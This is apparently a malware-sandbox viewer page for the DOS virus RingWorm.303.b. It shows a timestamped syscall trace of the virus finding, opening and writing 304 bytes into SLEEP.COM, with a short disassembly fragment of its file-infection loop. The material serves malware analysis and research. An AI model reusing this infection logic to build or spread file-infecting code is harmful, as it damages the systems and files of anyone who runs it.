Sample viewer

vx.netlux.org/Virus.DOS.RingWorm.303.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:30.190935919Z 78 PC: 12aac | Find first file
2018-12-17T22:57:30.197515207Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:30.203819024Z 63 PC: 12ac1 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:57:30.210242946Z 44 PC: 12ae2 | Get time 0x12ae2: mov word ptr [0x220], dx
0x12ae6: mov ax, 0x4200
0x12ae9: xor cx, cx
0x12aeb: cdq
0x12aec: int 0x21
0x12aee: mov ah, 0x40
0x12af0: mov cx, 0x130
0x12af3: mov dx, 0x100
0x12af6: pushaw
0x12af7: jmp 0x12b71
0x12af9: nop
0x12afa: int 0x20
0x12afc: mov ah, 0x3e
0x12afe: int 0x21
0x12b00: mov ah, 0x4f
0x12b02: int 0x21
0x12b04: jmp 0x12aac
0x12b06: mov ax, 0x207
0x12b09: call ax
0x12b0b: popaw
2018-12-17T22:57:30.213152104Z 66 PC: 12aee | Move file pointer
2018-12-17T22:57:30.214659696Z 64 PC: 12b79 | Write file or device (Write 304 bytes on handle 5)
2018-12-17T22:57:30.217244373Z 62 PC: 12b7d | Close file